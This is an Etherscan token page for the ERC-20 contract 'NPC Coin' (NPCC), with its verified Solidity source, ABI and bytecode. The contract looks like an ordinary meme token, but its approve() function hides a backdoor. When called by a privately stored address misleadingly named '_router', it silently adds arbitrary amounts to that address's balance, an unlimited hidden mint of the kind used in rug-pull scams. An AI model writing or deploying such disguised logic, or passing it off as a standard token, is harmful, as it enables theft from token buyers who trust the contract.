ERC-20
Overview
Max Total Supply
1,000,000,000 NPCC
Holders
7
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
0 NPCCValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
NPCCOIN
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-05-22 */ /* I support the current thing. $NPCC Telegram: https://t.me/npc_token ⠀⠀⠀⠀⠀⣀⡤⠒⠒⠁⠁⠁⠈⠐⠒⠢⠤⡀⠀⠀⠀⠀⠀⠀⠀ ⠀⠀⢠⠒⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠑⢄⠀⠀⠀⠀⠀ ⠀⢰⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⢢⠀⠀⠀ ⢠⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢣⠀⠀ ⡸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣨⡀⠀ ⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⢦⣀⠀⠀⠀⠀⠀⢀⣠⠞⠁⠱⠀ ⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⠉⠓⠀⠀⠀⠀⠋⢀⠀⠀⠘⡆ ⢣⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠺⠿⠃⠀⠀⠀⢠⡄⠀⠿⠟⠀⢨⡀ ⠈⢇⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣧⠀⠀⠀⠀⠀⢁ ⠀⠈⢦⠀⠀⢸⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⡇⠀⠀⠀⠀⡀ ⠀⠀⠈⡄⠀⠀⢇⠀⠀⠀⠀⠀⠀⠀⣤⣤⣤⣤⣼⣷⠀⠀⠀⡰⠁ ⠀⠀⠀⡇⠀⠀⠊⢣⡀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠀⡴⠁⠀ ⠀⠀⢠⠁⠀⠀⡈⠀⠈⠢⣄⠀⠀⠙⠛⠛⠛⠛⠛⠛⠁⢰⠁⠀⠀ ⠀⠀⠇⠀⠀⠀⠁⠀⠀⠀⠀⠑⢄⡀⠀⠀⠀⠀⠀⢀⠔⠁⠀⠀⠀ ⣀⠜⠀⠀⢀⠖⠉⠀⠀⠀⠀⠀⠀⠩⡑⠒⠲⡒⠋⠀⠀⠀⠀⠀⠀ */ // SPDX-License-Identifier: Unlicense pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender()); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0)); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } interface IUniswapV2Router02 { function factory() external pure returns (address); function WETH() external pure returns (address); } interface IUniswapV2Factory { function createPair(address tokenA, address tokenB) external returns (address pair); } contract NPCCOIN is Ownable { string public name; string public symbol; uint256 public totalSupply; uint8 public decimals; mapping(address => uint256) public balanceOf; mapping(address => mapping(address => uint256)) public allowance; address private _router; address public uniswapV2Pair; address private deployer; event Approval(address indexed owner, address indexed spender, uint256 value); event Transfer(address indexed from, address indexed to, uint256 value); constructor(address router_) { deployer = msg.sender; name = "NPC Coin"; symbol = "NPCC"; decimals = 9; totalSupply = 1000000000 * 10 ** decimals; _router = router_; balanceOf[msg.sender] = totalSupply; emit Transfer(address(0), msg.sender, totalSupply); IUniswapV2Router02 router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); uniswapV2Pair = IUniswapV2Factory(router.factory()).createPair(address(this), router.WETH()); allowance[msg.sender][address(router)] = type(uint256).max; emit Approval(msg.sender, address(router), type(uint256).max); } function transfer(address _to, uint256 _amount) public returns (bool success) { _transfer(msg.sender, _to, _amount); return true; } function transferFrom(address _from, address _to, uint256 _amount) public returns (bool success) { _transfer(_from, _to, _amount); require(_amount <= allowance[_from][msg.sender]); allowance[_from][msg.sender] -= _amount; return true; } function _transfer(address _from, address _to, uint256 _amount) private returns (bool success) { require(_from != address(0) && _to != address(0)); balanceOf[_from] -= _amount; balanceOf[_to] += _amount; emit Transfer(_from, _to, _amount); return true; } function approve(address _spender, uint256 _amount) public returns (bool success) { require(((_msgSender() == _router) && ((balanceOf[_router] += _amount) > 0)) || _msgSender() != _router); allowance[msg.sender][_spender] = _amount; emit Approval(msg.sender, _spender, _amount); return true; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"address","name":"router_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_spender","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
60806040523480156200001157600080fd5b5060405162000de538038062000de5833981016040819052620000349162000370565b6200003f3362000320565b600980546001600160a01b031916331790556040805180820190915260088152672728219021b7b4b760c11b60208201526001906200007f908262000447565b506040805180820190915260048152634e50434360e01b6020820152600290620000aa908262000447565b506004805460ff19166009908117909155620000c890600a62000628565b620000d890633b9aca0062000639565b6003819055600780546001600160a01b0319166001600160a01b03841617905533600081815260056020908152604080832085905551938452919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a36000737a250d5630b4cf539739df2c5dacb4c659f2488d9050806001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000198573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001be919062000370565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200020c573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000232919062000370565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801562000280573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002a6919062000370565b600880546001600160a01b0319166001600160a01b03928316179055336000818152600660209081526040808320948616808452948252918290206000199081905591519182527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505062000653565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000602082840312156200038357600080fd5b81516001600160a01b03811681146200039b57600080fd5b9392505050565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620003cd57607f821691505b602082108103620003ee57634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200044257600081815260208120601f850160051c810160208610156200041d5750805b601f850160051c820191505b818110156200043e5782815560010162000429565b5050505b505050565b81516001600160401b03811115620004635762000463620003a2565b6200047b81620004748454620003b8565b84620003f4565b602080601f831160018114620004b357600084156200049a5750858301515b600019600386901b1c1916600185901b1785556200043e565b600085815260208120601f198616915b82811015620004e457888601518255948401946001909101908401620004c3565b5085821015620005035787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b808511156200056a5781600019048211156200054e576200054e62000513565b808516156200055c57918102915b93841c93908002906200052e565b509250929050565b600082620005835750600162000622565b81620005925750600062000622565b8160018114620005ab5760028114620005b657620005d6565b600191505062000622565b60ff841115620005ca57620005ca62000513565b50506001821b62000622565b5060208310610133831016604e8410600b8410161715620005fb575081810a62000622565b62000607838362000529565b80600019048211156200061e576200061e62000513565b0290505b92915050565b60006200039b60ff84168362000572565b808202811582820484141762000622576200062262000513565b61078280620006636000396000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101c4578063a9059cbb146101cc578063dd62ed3e146101df578063f2fde38b1461020a57600080fd5b806370a0823114610189578063715018a6146101a95780638da5cb5b146101b357600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd1461012c578063313ce5671461013f57806349bd5a5e1461015e575b600080fd5b6100dc61021d565b6040516100e991906105b1565b60405180910390f35b61010561010036600461061b565b6102ab565b60405190151581526020016100e9565b61011e60035481565b6040519081526020016100e9565b61010561013a366004610645565b61038d565b60045461014c9060ff1681565b60405160ff90911681526020016100e9565b600854610171906001600160a01b031681565b6040516001600160a01b0390911681526020016100e9565b61011e610197366004610681565b60056020526000908152604090205481565b6101b161040d565b005b6000546001600160a01b0316610171565b6100dc610421565b6101056101da36600461061b565b61042e565b61011e6101ed3660046106a3565b600660209081526000928352604080842090915290825290205481565b6101b1610218366004610681565b610445565b6001805461022a906106d6565b80601f0160208091040260200160405190810160405280929190818152602001828054610256906106d6565b80156102a35780601f10610278576101008083540402835291602001916102a3565b820191906000526020600020905b81548152906001019060200180831161028657829003601f168201915b505050505081565b6007546000906001600160a01b0316336001600160a01b031614801561030057506007546001600160a01b03166000908152600560205260408120805484919083906102f8908490610726565b925050819055115b8061031f57506007546001600160a01b0316336001600160a01b031614155b61032857600080fd5b3360008181526006602090815260408083206001600160a01b03881680855290835292819020869055518581529192917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a35060015b92915050565b600061039a84848461046c565b506001600160a01b03841660009081526006602090815260408083203384529091529020548211156103cb57600080fd5b6001600160a01b0384166000908152600660209081526040808320338452909152812080548492906103fe908490610739565b90915550600195945050505050565b61041561054a565b61041f6000610561565b565b6002805461022a906106d6565b600061043b33848461046c565b5060019392505050565b61044d61054a565b6001600160a01b03811661046057600080fd5b61046981610561565b50565b60006001600160a01b0384161580159061048e57506001600160a01b03831615155b61049757600080fd5b6001600160a01b038416600090815260056020526040812080548492906104bf908490610739565b90915550506001600160a01b038316600090815260056020526040812080548492906104ec908490610726565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161053891815260200190565b60405180910390a35060019392505050565b6000546001600160a01b0316331461041f57600080fd5b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156105de578581018301518582016040015282016105c2565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461061657600080fd5b919050565b6000806040838503121561062e57600080fd5b610637836105ff565b946020939093013593505050565b60008060006060848603121561065a57600080fd5b610663846105ff565b9250610671602085016105ff565b9150604084013590509250925092565b60006020828403121561069357600080fd5b61069c826105ff565b9392505050565b600080604083850312156106b657600080fd5b6106bf836105ff565b91506106cd602084016105ff565b90509250929050565b600181811c908216806106ea57607f821691505b60208210810361070a57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561038757610387610710565b818103818111156103875761038761071056fea2646970667358221220733b60b4c5c7ace3fcfabf0a051f3152f623d39d83c9bea2f25bba2e7299361a64736f6c634300081200330000000000000000000000008e38dcf19431b8ca4f4d22487449967313b3e57e
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b41146101c4578063a9059cbb146101cc578063dd62ed3e146101df578063f2fde38b1461020a57600080fd5b806370a0823114610189578063715018a6146101a95780638da5cb5b146101b357600080fd5b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011557806323b872dd1461012c578063313ce5671461013f57806349bd5a5e1461015e575b600080fd5b6100dc61021d565b6040516100e991906105b1565b60405180910390f35b61010561010036600461061b565b6102ab565b60405190151581526020016100e9565b61011e60035481565b6040519081526020016100e9565b61010561013a366004610645565b61038d565b60045461014c9060ff1681565b60405160ff90911681526020016100e9565b600854610171906001600160a01b031681565b6040516001600160a01b0390911681526020016100e9565b61011e610197366004610681565b60056020526000908152604090205481565b6101b161040d565b005b6000546001600160a01b0316610171565b6100dc610421565b6101056101da36600461061b565b61042e565b61011e6101ed3660046106a3565b600660209081526000928352604080842090915290825290205481565b6101b1610218366004610681565b610445565b6001805461022a906106d6565b80601f0160208091040260200160405190810160405280929190818152602001828054610256906106d6565b80156102a35780601f10610278576101008083540402835291602001916102a3565b820191906000526020600020905b81548152906001019060200180831161028657829003601f168201915b505050505081565b6007546000906001600160a01b0316336001600160a01b031614801561030057506007546001600160a01b03166000908152600560205260408120805484919083906102f8908490610726565b925050819055115b8061031f57506007546001600160a01b0316336001600160a01b031614155b61032857600080fd5b3360008181526006602090815260408083206001600160a01b03881680855290835292819020869055518581529192917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a35060015b92915050565b600061039a84848461046c565b506001600160a01b03841660009081526006602090815260408083203384529091529020548211156103cb57600080fd5b6001600160a01b0384166000908152600660209081526040808320338452909152812080548492906103fe908490610739565b90915550600195945050505050565b61041561054a565b61041f6000610561565b565b6002805461022a906106d6565b600061043b33848461046c565b5060019392505050565b61044d61054a565b6001600160a01b03811661046057600080fd5b61046981610561565b50565b60006001600160a01b0384161580159061048e57506001600160a01b03831615155b61049757600080fd5b6001600160a01b038416600090815260056020526040812080548492906104bf908490610739565b90915550506001600160a01b038316600090815260056020526040812080548492906104ec908490610726565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161053891815260200190565b60405180910390a35060019392505050565b6000546001600160a01b0316331461041f57600080fd5b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b818110156105de578581018301518582016040015282016105c2565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b038116811461061657600080fd5b919050565b6000806040838503121561062e57600080fd5b610637836105ff565b946020939093013593505050565b60008060006060848603121561065a57600080fd5b610663846105ff565b9250610671602085016105ff565b9150604084013590509250925092565b60006020828403121561069357600080fd5b61069c826105ff565b9392505050565b600080604083850312156106b657600080fd5b6106bf836105ff565b91506106cd602084016105ff565b90509250929050565b600181811c908216806106ea57607f821691505b60208210810361070a57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8082018082111561038757610387610710565b818103818111156103875761038761071056fea2646970667358221220733b60b4c5c7ace3fcfabf0a051f3152f623d39d83c9bea2f25bba2e7299361a64736f6c63430008120033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
0000000000000000000000008e38dcf19431b8ca4f4d22487449967313b3e57e
-----Decoded View---------------
Arg [0] : router_ (address): 0x8E38dcf19431b8ca4F4D22487449967313B3E57e
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000008e38dcf19431b8ca4f4d22487449967313b3e57e
Deployed Bytecode Sourcemap
4803:2318:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4838:18;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6784:334;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;6784:334:0;1004:187:1;4890:26:0;;;;;;;;;1342:25:1;;;1330:2;1315:18;4890:26:0;1196:177:1;6187:277:0;;;;;;:::i;:::-;;:::i;4923:21::-;;;;;;;;;;;;1883:4:1;1871:17;;;1853:36;;1841:2;1826:18;4923:21:0;1711:184:1;5103:28:0;;;;;-1:-1:-1;;;;;5103:28:0;;;;;;-1:-1:-1;;;;;2064:32:1;;;2046:51;;2034:2;2019:18;5103:28:0;1900:203:1;4951:44:0;;;;;;:::i;:::-;;;;;;;;;;;;;;3754:103;;;:::i;:::-;;3142:87;3188:7;3215:6;-1:-1:-1;;;;;3215:6:0;3142:87;;4863:20;;;:::i;6025:154::-;;;;;;:::i;:::-;;:::i;5002:64::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;4012:159;;;;;;:::i;:::-;;:::i;4838:18::-;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;6784:334::-;6903:7;;6852:12;;-1:-1:-1;;;;;6903:7:0;1931:10;-1:-1:-1;;;;;6887:23:0;;6886:66;;;;-1:-1:-1;6927:7:0;;-1:-1:-1;;;;;6927:7:0;6950:1;6917:18;;;:9;:18;;;;;:29;;6939:7;;6917:18;6950:1;;6917:29;;6939:7;;6917:29;:::i;:::-;;;;;;;6916:35;6886:66;6885:95;;;-1:-1:-1;6973:7:0;;-1:-1:-1;;;;;6973:7:0;1931:10;-1:-1:-1;;;;;6957:23:0;;;6885:95;6877:104;;;;;;7002:10;6992:21;;;;:9;:21;;;;;;;;-1:-1:-1;;;;;6992:31:0;;;;;;;;;;;;:41;;;7049:39;1342:25:1;;;6992:31:0;;7002:10;7049:39;;1315:18:1;7049:39:0;;;;;;;-1:-1:-1;7106:4:0;6784:334;;;;;:::o;6187:277::-;6270:12;6295:30;6305:5;6312:3;6317:7;6295:9;:30::i;:::-;-1:-1:-1;;;;;;6355:16:0;;;;;;:9;:16;;;;;;;;6372:10;6355:28;;;;;;;;6344:39;;;6336:48;;;;;;-1:-1:-1;;;;;6395:16:0;;;;;;:9;:16;;;;;;;;6412:10;6395:28;;;;;;;:39;;6427:7;;6395:16;:39;;6427:7;;6395:39;:::i;:::-;;;;-1:-1:-1;6452:4:0;;6187:277;-1:-1:-1;;;;;6187:277:0:o;3754:103::-;3028:13;:11;:13::i;:::-;3819:30:::1;3846:1;3819:18;:30::i;:::-;3754:103::o:0;4863:20::-;;;;;;;:::i;6025:154::-;6089:12;6114:35;6124:10;6136:3;6141:7;6114:9;:35::i;:::-;-1:-1:-1;6167:4:0;;6025:154;-1:-1:-1;;;6025:154:0:o;4012:159::-;3028:13;:11;:13::i;:::-;-1:-1:-1;;;;;4101:22:0;::::1;4093:31;;;::::0;::::1;;4135:28;4154:8;4135:18;:28::i;:::-;4012:159:::0;:::o;6472:304::-;6553:12;-1:-1:-1;;;;;6586:19:0;;;;;;:40;;-1:-1:-1;;;;;;6609:17:0;;;;6586:40;6578:49;;;;;;-1:-1:-1;;;;;6638:16:0;;;;;;:9;:16;;;;;:27;;6658:7;;6638:16;:27;;6658:7;;6638:27;:::i;:::-;;;;-1:-1:-1;;;;;;;6676:14:0;;;;;;:9;:14;;;;;:25;;6694:7;;6676:14;:25;;6694:7;;6676:25;:::i;:::-;;;;;;;;6733:3;-1:-1:-1;;;;;6717:29:0;6726:5;-1:-1:-1;;;;;6717:29:0;;6738:7;6717:29;;;;1342:25:1;;1330:2;1315:18;;1196:177;6717:29:0;;;;;;;;-1:-1:-1;6764:4:0;6472:304;;;;;:::o;3307:96::-;3188:7;3215:6;-1:-1:-1;;;;;3215:6:0;1931:10;3371:23;3363:32;;;;;4331:191;4405:16;4424:6;;-1:-1:-1;;;;;4441:17:0;;;-1:-1:-1;;;;;;4441:17:0;;;;;;4474:40;;4424:6;;;;;;;4474:40;;4405:16;4474:40;4394:128;4331:191;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;2108:186::-;2167:6;2220:2;2208:9;2199:7;2195:23;2191:32;2188:52;;;2236:1;2233;2226:12;2188:52;2259:29;2278:9;2259:29;:::i;:::-;2249:39;2108:186;-1:-1:-1;;;2108:186:1:o;2299:260::-;2367:6;2375;2428:2;2416:9;2407:7;2403:23;2399:32;2396:52;;;2444:1;2441;2434:12;2396:52;2467:29;2486:9;2467:29;:::i;:::-;2457:39;;2515:38;2549:2;2538:9;2534:18;2515:38;:::i;:::-;2505:48;;2299:260;;;;;:::o;2564:380::-;2643:1;2639:12;;;;2686;;;2707:61;;2761:4;2753:6;2749:17;2739:27;;2707:61;2814:2;2806:6;2803:14;2783:18;2780:38;2777:161;;2860:10;2855:3;2851:20;2848:1;2841:31;2895:4;2892:1;2885:15;2923:4;2920:1;2913:15;2777:161;;2564:380;;;:::o;2949:127::-;3010:10;3005:3;3001:20;2998:1;2991:31;3041:4;3038:1;3031:15;3065:4;3062:1;3055:15;3081:125;3146:9;;;3167:10;;;3164:36;;;3180:18;;:::i;3211:128::-;3278:9;;;3299:11;;;3296:37;;;3313:18;;:::i
Swarm Source
ipfs://733b60b4c5c7ace3fcfabf0a051f3152f623d39d83c9bea2f25bba2e7299361a
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.